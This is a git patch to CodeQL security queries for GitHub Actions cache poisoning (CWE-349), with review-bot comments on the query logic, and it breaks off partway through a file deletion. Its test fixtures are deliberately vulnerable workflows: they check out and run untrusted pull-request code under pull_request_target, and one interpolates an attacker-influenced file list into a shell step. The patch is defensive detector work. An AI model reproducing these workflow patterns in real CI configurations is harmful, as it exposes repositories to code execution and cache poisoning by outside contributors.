From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:04:34 +0200 Subject: [PATCH 0456/1267] Split Cache Poisoning queries in 3 Split them into 3 queries depending of how the cache can be poisoned: - control of cached files - execution of controlled code - code injection Remove `setup-XXX` actions from CacheWriting class since the cached files are not in the CWD --- ...n.ql => CachePoisoningViaCodeInjection.ql} | 2 +- ...ing.ql => CachePoisoningViaDirectCache.ql} | 49 ++++------ .../CachePoisoningViaPoisonableStep.ql | 58 +++++++++++ .../{test9.yml => code_injection1.yml} | 0 .../.github/workflows/code_injection2.yml | 16 +++ .../{test1.yml => direct_cache1.yml} | 0 .../{test2.yml => direct_cache2.yml} | 0 .../{test11.yml => direct_cache3.yml} | 0 .../{test15.yml => direct_cache4.yml} | 0 .../{test16.yml => direct_cache5.yml} | 0 .../{test23.yml => direct_cache6.yml} | 0 .../{test10.yml => neg_code_injection1.yml} | 0 .../{test13.yml => neg_direct_cache1.yml} | 0 .../{test14.yml => neg_direct_cache2.yml} | 0 .../{test22.yml => neg_direct_cache3.yml} | 0 .../{test12.yml => neg_poisonable_step1.yml} | 0 .../{test18.yml => neg_poisonable_step2.yml} | 16 +-- .../CWE-349/.github/workflows/poc.yml | 63 ------------ .../CWE-349/.github/workflows/poc2.yml | 58 ----------- .../CWE-349/.github/workflows/poc3.yml | 64 ------------ .../{test8.yml => poisonable_step1.yml} | 0 .../{test17.yml => poisonable_step2.yml} | 0 .../.github/workflows/poisonable_step3.yml | 19 ++++ .../.github/workflows/poisonable_step4.yml | 18 ++++ .../.github/workflows/poisonable_step5.yml | 28 ++++++ .../CWE-349/.github/workflows/test19.yml | 42 -------- .../CWE-349/.github/workflows/test20.yml | 46 --------- .../CWE-349/.github/workflows/test21.yml | 44 --------- .../CWE-349/.github/workflows/test3.yml | 23 ----- .../CWE-349/.github/workflows/test4.yml | 21 ---- .../CWE-349/.github/workflows/test5.yml | 19 ---- .../CWE-349/.github/workflows/test6.yml | 18 ---- 
.../CWE-349/.github/workflows/test7.yml | 17 ---- .../Security/CWE-349/CachePoisoning.expected | 98 ------------------- .../Security/CWE-349/CachePoisoning.qlref | 2 - .../CachePoisoningByCodeInjection.expected | 20 ---- .../CachePoisoningByCodeInjection.qlref | 2 - .../CachePoisoningViaCodeInjection.expected | 11 +++ .../CachePoisoningViaCodeInjection.qlref | 2 + .../CachePoisoningViaDirectCache.expected | 48 +++++++++ .../CachePoisoningViaDirectCache.qlref | 2 + .../CachePoisoningViaPoisonableStep.expected | 49 ++++++++++ .../CachePoisoningViaPoisonableStep.qlref | 2 + 43 files changed, 275 insertions(+), 582 deletions(-) rename ql/src/Security/CWE-349/{CachePoisoningByCodeInjection.ql => CachePoisoningViaCodeInjection.ql} (96%) rename ql/src/Security/CWE-349/{CachePoisoning.ql => CachePoisoningViaDirectCache.ql} (68%) create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test9.yml => code_injection1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test1.yml => direct_cache1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test2.yml => direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test11.yml => direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test15.yml => direct_cache4.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test16.yml => direct_cache5.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test23.yml => direct_cache6.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test10.yml => neg_code_injection1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test13.yml => neg_direct_cache1.yml} (100%) rename 
ql/test/query-tests/Security/CWE-349/.github/workflows/{test14.yml => neg_direct_cache2.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test22.yml => neg_direct_cache3.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test12.yml => neg_poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test18.yml => neg_poisonable_step2.yml} (54%) delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test8.yml => poisonable_step1.yml} (100%) rename ql/test/query-tests/Security/CWE-349/.github/workflows/{test17.yml => poisonable_step2.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test3.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test4.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test5.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test6.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test7.yml delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoning.expected delete mode 100644 
ql/test/query-tests/Security/CWE-349/CachePoisoning.qlref delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected delete mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql similarity index 96% rename from ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql rename to ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index e7f1385f3cd..685bdcca401 100644 --- a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -1,5 +1,5 @@ /** - * @name Cache Poisoning via low-privilege code injection + * @name Cache Poisoning via low-privileged code injection * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql similarity index 68% rename from ql/src/Security/CWE-349/CachePoisoning.ql rename to ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 3807cb4b592..ea36bcf0be1 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql 
@@ -1,11 +1,11 @@ /** - * @name Cache Poisoning + * @name Cache Poisoning via caching of untrusted files * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. * @kind path-problem * @problem.severity error * @precision high * @security-severity 7.5 - * @id actions/cache-poisoning + * @id actions/cache-poisoning/direct-cache * @tags actions * security * external/cwe/cwe-349 @@ -45,6 +45,8 @@ query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, Event e, Step source, Step s, string message, string path where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + j.getAStep() = source and ( source instanceof PRHeadCheckoutStep and message = "due to privilege checkout of untrusted code." and 
@@ -54,46 +56,35 @@ where message = "due to downloading an untrusted artifact." and path = source.(UntrustedArtifactDownloadStep).getPath() ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and - // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) or - // the workflow caller runs in the context of the default branch + // the workflow's caller runs in the context of the default branch e.getName() = "workflow_call" and exists(ExternalJob caller | caller.getCallee() = j.getLocation().getFile().getRelativePath() and runsOnDefaultBranch(caller.getATriggerEvent()) ) ) and - // the job checkouts untrusted code from a pull request - j.getAStep() = source and + // the job writes to the cache + // (No need to follow the checkout/download step since the cache is normally write after the job completes) + j.getAStep() = s and + s instanceof CacheWritingStep and ( - // the job writes to the cache - // (No need to follow the checkout step as the cache writing is normally done after the job completes) - j.getAStep() = s and - s instanceof CacheWritingStep and - ( - // we dont know what code can be controlled by the attacker - path = "?" - or - // we dont know what files are being cached - s.(CacheWritingStep).getPath() = "?" - or - // the cache writing step reads from the path the attacker can control - not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) - ) and - not s instanceof PoisonableStep + // we dont know what code can be controlled by the attacker + path = "?" 
or - // the job executes checked-out code - // (The cache specific token can be leaked even for non-privileged workflows) - source.getAFollowingStep() = s and - s instanceof PoisonableStep and - // excluding privileged workflows since they can be exploited in easier circumstances - not j.isPrivileged() - ) + // we dont know what files are being cached + s.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from a path the attacker can control + not path = "?" and controlledCachePath(s.(CacheWritingStep).getPath(), path) + ) and + not s instanceof PoisonableStep select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql new file mode 100644 index 00000000000..ee2719f0611 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql 
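Review bot: The disjunct `s.(CacheWritingStep).getPath() = "?"` under `// we dont know what files are being cached` looks unreachable now. The previous commit on this page removed every `result = "?"` override from `CachePoisoningQuery.qll`, and the remaining classes return the `path` argument or `"vendor/bundle"`. If no other `CacheWritingStep` subclass still yields `"?"` (not visible here), drop the disjunct or document which step it covers; as written it suggests unknown cache paths are still reported conservatively when they may not be. In the comment above it, `the cache is normally write after the job completes` should read `written`. The `where` clause starts outside this hunk.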
@@ -0,0 +1,58 @@ +/** + * @name Cache Poisoning via execution of untrusted code + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/cache-poisoning/poisonable-step + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from LocalJob j, Event e, Step source, Step s, string message, string path +where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + j.getAStep() = source and + ( + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." 
and + path = source.(UntrustedArtifactDownloadStep).getPath() + ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | check.protects(source, j.getATriggerEvent())) and + j.getATriggerEvent() = e and + // job can be triggered by an external user + e.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(e) + or + // the workflow's caller runs in the context of the default branch + e.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = j.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // the job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + source.getAFollowingStep() = s and + s instanceof PoisonableStep and + // excluding privileged workflows since they can be exploited in easier circumstances + not j.isPrivileged() +select s, source, s, "Potential cache poisoning in the context of the default branch " + message diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml new file mode 100644 index 00000000000..9c87340d7ab --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml 
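Review bot: `path` is declared in the `from` clause and bound to `source.(PRHeadCheckoutStep).getPath()` and `source.(UntrustedArtifactDownloadStep).getPath()`, but nothing else in this query reads it, because there is no cache-path comparison here. The binding still acts as a filter, so a source step whose `getPath()` has no result would be dropped from the alerts unnoticed. Suggest `from LocalJob j, Event e, Step source, Step s, string message` and deleting the two `path = …` conjuncts. The trigger and control-check conditions are copied from `CachePoisoningViaDirectCache.ql`, so moving them into a shared predicate in `CachePoisoningQuery.qll` would keep the two queries from drifting. The `@description` is the same sentence in the queries shown here, which makes their alerts hard to tell apart.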
@@ -0,0 +1,16 @@ +name: Test + +on: + pull_request_target: + branches: [ master, main, dev ] + +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: modified_files + uses: trilom/file-changes-action@v1.2.4 + with: + output: "," + - run: echo "${{ steps.modified_files.outputs.files_modified }}" diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test1.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test2.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test11.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test15.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test16.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test23.yml
rename to ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test10.yml
rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test13.yml
rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test14.yml
rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml
similarity index 100%
rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test22.yml
rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test12.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml similarity index 54% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml index 6bfdc5b7d50..be1533f2231 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test18.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml @@ -5,27 +5,13 @@ on: push: branches: - main - - 'releases/*' jobs: - verify-build: + test: runs-on: ubuntu-latest - steps: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version-file: .nvmrc - - - name: Install NPM dependencies - run: npm ci - - - name: Rebuild the dist/ directory - run: npm run build - - name: Compare the expected and actual dist/ directories run: bin/check-build-output-in-dist-directory diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml deleted file mode 100644 index 6900c3bc23f..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml +++ /dev/null 
@@ -1,63 +0,0 @@ -# This workflow uses actions that are not certified by GitHub. -# They are provided by a third-party and are governed by -# separate terms of service, privacy policy, and support -# documentation. - -# Sample workflow for building and deploying a Jekyll site to GitHub Pages -name: Deploy Jekyll site to Pages preview environment -on: - # Runs on pull requests targeting the default branch - pull_request_target: - branches: ["main"] -# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages -permissions: - contents: read - pages: write - id-token: write -# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. -# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. -concurrency: - group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' - cancel-in-progress: false -jobs: - # Build job - build: - # Limit permissions of the GITHUB_TOKEN for untrusted code - permissions: - contents: read - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - with: - # For PRs make sure to checkout the PR branch - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages - uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll - uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 - with: - source: ./ - destination: ./_site - - name: Upload artifact - # Automatically uploads an artifact from the './_site' directory by default - uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 - # Deployment job - deploy: - environment: - name: 'Pages Preview' - url: ${{ steps.deployment.outputs.page_url }} - # Sets permissions of the GITHUB_TOKEN to allow deployment to 
GitHub Pages - permissions: - contents: read - pages: write - id-token: write - runs-on: ubuntu-latest - needs: build - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 - with: - preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml deleted file mode 100644 index 5501beb9ea2..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml +++ /dev/null 
@@ -1,58 +0,0 @@ -name: branch-deploy - -on: - issue_comment: - types: [created] - -# Permissions needed for reacting and adding comments for IssueOps commands -permissions: - pull-requests: write - deployments: write - contents: write - checks: read - -jobs: - branch-deploy: - name: branch-deploy - if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings - ${{ github.event.issue.pull_request && - (startsWith(github.event.comment.body, '.deploy') || - startsWith(github.event.comment.body, '.noop') || - startsWith(github.event.comment.body, '.lock') || - startsWith(github.event.comment.body, '.help') || - startsWith(github.event.comment.body, '.wcid') || - startsWith(github.event.comment.body, '.unlock')) }} - runs-on: ubuntu-latest - - steps: - - name: branch-deploy - id: branch-deploy - uses: github/branch-deploy@v9 - with: - trigger: ".deploy" - environment: "production" - sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md - - # Check out the ref from the output of the IssueOps command - - uses: actions/checkout@v4 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - ref: ${{ steps.branch-deploy.outputs.ref }} - - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - with: - bundler-cache: true - - - name: bootstrap - if: ${{ steps.branch-deploy.outputs.continue == 'true' }} - run: script/bootstrap - - # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue - - name: deploy - if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} - run: | - set -o pipefail - script/deploy | tee deploy.out - bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml deleted file mode 100644 index 4d5ae1f528c..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml +++ /dev/null 
@@ -1,64 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' - - deploy: - runs-on: ubuntu-latest - needs: build-and-upload - environment: - name: github-pages - url: ${{ steps.deployment.outputs.page_url }} - permissions: - pages: write - id-token: write - outputs: - deployment_url: ${{ steps.deployment.outputs.page_url }} - steps: - - name: Deploy to GitHub Pages - id: deployment - uses: actions/deploy-pages@v1 - with: - preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml 
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml rename to ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml new file mode 100644 index 00000000000..8539bf2bda4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step3.yml @@ -0,0 +1,19 @@ +name: Publish + +on: + pull_request_target: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - run: npm run build -w www diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml new file mode 100644 index 00000000000..6e2351c1744 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step4.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./foo diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml new file mode 100644 index 00000000000..9742bd01a48 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step5.yml @@ -0,0 +1,28 @@ +name: Test +on: + pull_request_target: + branches: ["main"] + +permissions: + contents: read + pages: write + id-token: write + +jobs: + build: + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml deleted file mode 100644 index 1f0e7291442..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test19.yml +++ /dev/null 
@@ -1,42 +0,0 @@ -name: Close Translation Pull Requests - -on: - pull_request_target: - branches: [ master, main, dev ] - -jobs: - - close-translation-prs: - - name: Close Translation Pull Requests - runs-on: ubuntu-latest - - steps: - - name: Get changed files - id: modified_files - uses: trilom/file-changes-action@v1.2.4 - with: - output: "," - - - name: Check the PR for translations - id: check - run: | - shopt -s nocasematch - if [[ "${{ steps.modified_files.outputs.files_modified }}" == *"en_gb/strings.po"* ]]; then - echo "Found modified en_gb, likely a valid PR" - unset CLOSE - elif [[ "${{ steps.modified_files.outputs.files_modified }}" == *"strings.po"* ]]; then - echo "Found modified strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_added }}" == *"strings.po"* ]]; then - echo "Found added strings.po, unwanted." - CLOSE="true" - elif [[ "${{ steps.modified_files.outputs.files_removed }}" == *"strings.po"* ]]; then - echo "Found removed strings.po, unwanted." - CLOSE="true" - else - echo "No strings.po were modified or added, not a translation." - unset CLOSE - fi - echo ::set-output name=close::${CLOSE} - diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml deleted file mode 100644 index a07f2922fd7..00000000000 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml +++ /dev/null 
@@ -1,46 +0,0 @@ -name: Publish - -on: - push: - branches: - - main - pull_request_target: - workflow_dispatch: - workflow_call: - -jobs: - build-and-upload: - runs-on: ubuntu-latest - permissions: - contents: read - steps: - - - name: Checkout PR - if: ${{ github.event_name == 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: ${{ github.event.pull_request.head.ref }} - repository: ${{ github.event.pull_request.head.repo.full_name }} - - - name: Checkout - if: ${{ github.event_name != 'pull_request_target' }} - uses: actions/checkout@v3 - with: - ref: main - - - name: Setup Pages - uses: actions/configure-pages@v1 - - name: Use Node.js - uses: actions/setup-node@v3 - with: - node-version: 18 - cache: npm - - name: Update npm to latest - run: npm i --prefer-online --no-fund --no-audit -g npm@latest - - run: npm -v - - run: npm i --ignore-scripts --no-audit --no-fund --package-lock - - run: npm run build -w www - - name: Upload artifact - uses: actions/upload-pages-artifact@v1 - with: - path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml deleted file mode 100644 index 